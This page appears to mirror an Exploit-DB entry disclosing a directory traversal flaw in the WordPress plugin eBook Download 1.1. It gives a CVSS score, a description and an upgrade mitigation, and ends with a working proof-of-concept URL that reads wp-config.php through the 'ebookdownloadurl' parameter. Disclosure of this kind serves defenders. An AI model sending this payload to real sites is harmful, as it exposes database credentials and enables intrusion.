header-logo
Suggest Exploit
vendor:
eBook Download
by:
Wadeek
7,5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: eBook Download
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:ebook_download:1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Xampp on Windows7
2020

WordPress eBook Download 1.1 | Directory Traversal

A directory traversal vulnerability exists in Wordpress eBook Download 1.1, which allows an attacker to read arbitrary files on the server. This is due to the lack of proper validation of the 'ebookdownloadurl' parameter in the 'filedownload.php' script. An attacker can exploit this vulnerability by sending a crafted HTTP request containing directory traversal sequences (e.g. '../') to the vulnerable script. This will allow the attacker to read arbitrary files on the server.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of the plugin.
Source

Exploit-DB raw data:

# Exploit Title: Wordpress eBook Download 1.1 | Directory Traversal
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/ebook-download.zip
# Version: 1.1
# Tested on: Xampp on Windows7
 
[Version Disclosure]
======================================
http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt
======================================
 
[PoC]
======================================
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
======================================

Navigation

Suggest Exploit

Services By CQR